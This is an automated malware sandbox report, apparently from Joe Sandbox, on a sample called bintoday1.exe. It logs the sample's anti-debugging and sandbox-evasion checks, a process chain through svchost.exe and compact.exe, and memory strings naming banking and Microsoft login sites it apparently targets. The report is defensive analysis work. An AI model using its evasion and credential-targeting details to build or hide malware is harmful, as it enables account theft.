Source: bintoday1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: bintoday1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: bintoday1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: bintoday1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: bintoday1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: bintoday1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: bintoday1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: compact.pdbGCTL source: svchost.exe, 00000002.00000003.2416928087.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2417029817.0000000002A24000.00000004.00000020.00020000.00000000.sdmp, eypfpUNFpbLX.exe, 00000006.00000002.4020528447.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: eypfpUNFpbLX.exe, 00000006.00000000.2369272396.00000000005FE000.00000002.00000001.01000000.00000005.sdmp, eypfpUNFpbLX.exe, 00000009.00000000.2528816800.00000000005FE000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP source: bintoday1.exe, 00000000.00000003.2184813906.0000000003780000.00000004.00001000.00020000.00000000.sdmp, bintoday1.exe, 00000000.00000003.2178684389.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2460602943.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346609007.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2348425557.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2460602943.000000000319E000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000007.00000003.2460297074.0000000000986000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000007.00000002.4024433236.0000000002EFE000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000007.00000002.4024433236.0000000002D60000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000007.00000003.2463034402.0000000002BAF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: bintoday1.exe, 00000000.00000003.2184813906.0000000003780000.00000004.00001000.00020000.00000000.sdmp, bintoday1.exe, 00000000.00000003.2178684389.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2460602943.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346609007.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2348425557.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2460602943.000000000319E000.00000040.00001000.00020000.00000000.sdmp, compact.exe, compact.exe, 00000007.00000003.2460297074.0000000000986000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000007.00000002.4024433236.0000000002EFE000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000007.00000002.4024433236.0000000002D60000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000007.00000003.2463034402.0000000002BAF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: compact.pdb source: svchost.exe, 00000002.00000003.2416928087.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2417029817.0000000002A24000.00000004.00000020.00020000.00000000.sdmp, eypfpUNFpbLX.exe, 00000006.00000002.4020528447.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: compact.exe, 00000007.00000002.4015509843.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000007.00000002.4026214953.000000000338C000.00000004.10000000.00040000.00000000.sdmp, eypfpUNFpbLX.exe, 00000009.00000002.4024011775.0000000002B4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2753680676.0000000019EAC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: compact.exe, 00000007.00000002.4015509843.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000007.00000002.4026214953.000000000338C000.00000004.10000000.00040000.00000000.sdmp, eypfpUNFpbLX.exe, 00000009.00000002.4024011775.0000000002B4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2753680676.0000000019EAC000.00000004.80000000.00040000.00000000.sdmp
Source: bintoday1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: bintoday1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: bintoday1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: bintoday1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: bintoday1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00B942DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00B942DE
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BB0A76 push ecx; ret 0_2_00BB0A89
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0047216F push esp; iretd 2_2_004721B7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0047212C push ecx; retf 2_2_00472133
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004721BC push esi; iretd 2_2_004721D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00481AB3 push ds; retf 2_2_00481ACC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00494313 push esi; ret 2_2_0049431B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00471CB0 push ecx; retf 2_2_00471CB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004735A0 push eax; ret 2_2_004735A2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00484660 push 2FC0C6F3h; iretd 2_2_0048467E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00493F93 push ecx; iretd 2_2_00493FA3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030309AD push ecx; mov dword ptr [esp], ecx 2_2_030309B6
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe Code function: 6_2_0333CBBC push ebx; ret 6_2_0333CC37
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe Code function: 6_2_0333FA49 push ecx; retf 6_2_0333FA4A
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe Code function: 6_2_0333D2AB push 3D07CFE4h; iretd 6_2_0333D318
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe Code function: 6_2_0333CF5B push edx; retf 6_2_0333CF5C
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe Code function: 6_2_0333864A push ds; retf 6_2_03338663
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe Code function: 6_2_0333CC1C push ebx; ret 6_2_0333CC37
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02D909AD push ecx; mov dword ptr [esp], ecx 7_2_02D909B6
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02D61366 push eax; iretd 7_2_02D61369
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_004DE510 push ds; retf 7_2_004DE529
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_004F09E8 push ecx; iretd 7_2_004F0A00
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_004F09F0 push ecx; iretd 7_2_004F0A00
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_004F0D62 push esi; ret 7_2_004F0D78
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_004F0D79 push 00000001h; ret 7_2_004F0D99
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_004F0D70 push esi; ret 7_2_004F0D78
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_004F0DB5 push 00000001h; ret 7_2_004F0D99
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_004F146B push cs; ret 7_2_004F1474
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_004F141D push cs; ret 7_2_004F1474
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_00AE0068 push cs; iretd 7_2_00AE00D6
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_00ADA27A push es; iretd 7_2_00ADA27E
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_00ADF488 push ss; ret 7_2_00ADF4A7
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BAF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00BAF98E
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00C21C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00C21C41
Source: C:\Users\user\Desktop\bintoday1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\bintoday1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\bintoday1.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Source: C:\Users\user\Desktop\bintoday1.exe API/Special instruction interceptor: Address: 33431F4
Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFDB442D7E4
Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFDB442DA44
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0307096E rdtsc 2_2_0307096E
Source: C:\Windows\SysWOW64\compact.exe Window / User API: threadDelayed 814 Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Window / User API: threadDelayed 9158 Jump to behavior
Source: C:\Users\user\Desktop\bintoday1.exe API coverage: 4.1 %
Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.7 %
Source: C:\Windows\SysWOW64\compact.exe API coverage: 2.6 %
Source: C:\Windows\SysWOW64\compact.exe TID: 4876 Thread sleep count: 814 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe TID: 4876 Thread sleep time: -1628000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe TID: 4876 Thread sleep count: 9158 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe TID: 4876 Thread sleep time: -18316000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe TID: 2832 Thread sleep time: -45000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\compact.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BFDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00BFDBBE
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BCC2A2 FindFirstFileExW, 0_2_00BCC2A2
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00C068EE FindFirstFileW,FindClose, 0_2_00C068EE
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00C0698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_00C0698F
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BFD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00BFD076
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BFD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00BFD3A9
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00C09642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00C09642
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00C0979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00C0979D
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00C09B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00C09B2B
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00C05C97 FindFirstFileW,FindNextFileW,FindClose, 0_2_00C05C97
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_004EC570 FindFirstFileW,FindNextFileW,FindClose, 7_2_004EC570
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00B942DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00B942DE
Source: 5E-50o.7.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 5E-50o.7.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: 5E-50o.7.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: 5E-50o.7.dr Binary or memory string: discord.comVMware20,11696487552f
Source: 5E-50o.7.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: 5E-50o.7.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: 5E-50o.7.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: 5E-50o.7.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 5E-50o.7.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 5E-50o.7.dr Binary or memory string: global block list test formVMware20,11696487552
Source: 5E-50o.7.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: firefox.exe, 0000000B.00000002.2758799659.000001CA19E7D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 5E-50o.7.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: 5E-50o.7.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: 5E-50o.7.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 5E-50o.7.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: 5E-50o.7.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: 5E-50o.7.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: 5E-50o.7.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 5E-50o.7.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 5E-50o.7.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 5E-50o.7.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 5E-50o.7.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 5E-50o.7.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: 5E-50o.7.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: 5E-50o.7.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 5E-50o.7.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 5E-50o.7.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 5E-50o.7.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 5E-50o.7.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: compact.exe, 00000007.00000002.4015509843.00000000006FD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL
Source: eypfpUNFpbLX.exe, 00000009.00000002.4022393648.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=
Source: 5E-50o.7.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 5E-50o.7.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0307096E rdtsc 2_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00487A63 LdrLoadDll, 2_2_00487A63
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00C0EAA2 BlockInput, 0_2_00C0EAA2
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BC2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00BC2622
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00B942DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00B942DE
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BB4CE8 mov eax, dword ptr fs:[00000030h] 0_2_00BB4CE8
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_03343460 mov eax, dword ptr fs:[00000030h] 0_2_03343460
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_033434C0 mov eax, dword ptr fs:[00000030h] 0_2_033434C0
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_03341E70 mov eax, dword ptr fs:[00000030h] 0_2_03341E70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h] 2_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h] 2_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h] 2_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302C310 mov ecx, dword ptr fs:[00000030h] 2_2_0302C310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03050310 mov ecx, dword ptr fs:[00000030h] 2_2_03050310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h] 2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h] 2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h] 2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B035C mov ecx, dword ptr fs:[00000030h] 2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h] 2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h] 2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FA352 mov eax, dword ptr fs:[00000030h] 2_2_030FA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D8350 mov ecx, dword ptr fs:[00000030h] 2_2_030D8350
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D437C mov eax, dword ptr fs:[00000030h] 2_2_030D437C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h] 2_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h] 2_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h] 2_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305438F mov eax, dword ptr fs:[00000030h] 2_2_0305438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305438F mov eax, dword ptr fs:[00000030h] 2_2_0305438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03028397 mov eax, dword ptr fs:[00000030h] 2_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03028397 mov eax, dword ptr fs:[00000030h] 2_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03028397 mov eax, dword ptr fs:[00000030h] 2_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030EC3CD mov eax, dword ptr fs:[00000030h] 2_2_030EC3CD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h] 2_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h] 2_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h] 2_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h] 2_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B63C0 mov eax, dword ptr fs:[00000030h] 2_2_030B63C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h] 2_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h] 2_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE3DB mov ecx, dword ptr fs:[00000030h] 2_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h] 2_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h] 2_2_030D43D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h] 2_2_030D43D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0304E3F0
